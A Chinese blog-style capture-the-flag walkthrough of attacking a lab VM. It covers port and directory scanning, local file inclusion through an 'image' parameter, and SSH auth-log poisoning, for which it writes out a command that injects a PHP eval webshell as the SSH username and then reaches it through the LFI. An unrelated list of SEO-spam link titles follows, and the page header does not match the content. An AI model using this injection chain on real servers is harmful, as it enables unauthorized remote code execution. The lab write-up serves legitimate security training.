当前位置: 首页 > news >正文

前端和网站部署做网站的廊坊优化外包

前端和网站部署做网站的,廊坊优化外包,网站建设实习目的,网站开发结构有一、导入靶机 将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径 虚拟机设置里修改网络状态为NAT模式 二、信息收集 1、主机发现 用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141 2、端口扫描 用御剑端口扫描扫描全…

一、导入靶机

将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径

虚拟机设置里修改网络状态为NAT模式

二、信息收集

1、主机发现

用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141

2、端口扫描

用御剑端口扫描扫描全端口

发现21、2211、80、25、1100和8888端口开启

3、访问Web服务

网页上访问192.168.204.141,出现一个大特码头

访问192.168.47.129:8888,弹出一个登录框

4、目录扫描

使用kali的dirb进行目录扫描:dirb http://192.168.204.141/

扫描结果如下

访问antibot_image目录

发现有一个info.php文件

点开发现是一个PHP的探针文件

查看info.php的网页源码,发现存在文件包含漏洞

三、漏洞利用

在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的,所以使用kali命令扫描nmap -A 192.168.204.141 -p-

扫描出来2211,是ssh远程连接端口

此时我们报错连接 2211

ssh '<?php @eval($_POST['cmd']);?>'@192.168.204.141 -p 2211

然后在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

该目录下发现多了一些报错信息,木马大概率写入成功,

使用蚁剑进行连接,上传了一句话木马的路径:

http://192.168.204.141/antibot_image/antibots/info.php?image=/var/log/auth.log

连接密码是刚刚POST传入的:cmd

成功登陆到靶机

http://www.tj-hxxt.cn/news/119747.html

相关文章:

  • 难道做网站的工资都不高吗如何在百度上营销
  • 品牌网站制作短视频运营方案策划书
  • 网站建设新报价图片武汉seo认可搜点网络
  • wordpress 崩溃南宁seo优化公司排名
  • 公司制作网站收费标准推广优化网站排名教程
  • 广东省建设厅官方网站多少钱关键词搜索推广排行榜
  • 男女做暖暖的时候网站全网营销推广怎么做
  • 网页浏览器软件有哪些沈阳企业网站seo公司
  • 做平面设计的一般浏览什么网站搜索排名查询
  • 用wp系统做网站个人介绍网页制作
  • 杭州网站优化排名百度推广登录平台怎么收费
  • remix做歌网站seo网站有哪些
  • 外贸软件定制aso如何优化
  • 有什么网站可以做问卷调查市场营销策划公司
  • dedecms做多语言的网站软文是指什么
  • 常德红网官网网站网络营销的基本职能
  • 布吉附近做网站竞价推广返点开户
  • 建筑工地新型材料模板抖音视频seo霸屏
  • 单机游戏大全搜索引擎的优化和推广
  • 想做个外贸网站合肥正规的seo公司
  • 菠菜网站怎么做推广比较好公司网站seo公司
  • 温州大凯工艺品有限公司英文网站百度seo快速排名优化软件
  • 组织建设是什么网站seo分析报告案例
  • 先做公众号在做网站品牌推广方式都有哪些
  • 南昌企业网站设计公司semi是什么意思
  • wordpress网站搭建教程2023年11月新冠高峰
  • 做网站的公司不会设计网站设计专业的公司
  • 找广网seo研究中心培训机构
  • 大型建设网站制作app平台搭建
  • 给孩子做衣服的网站常用网站推广方法及资源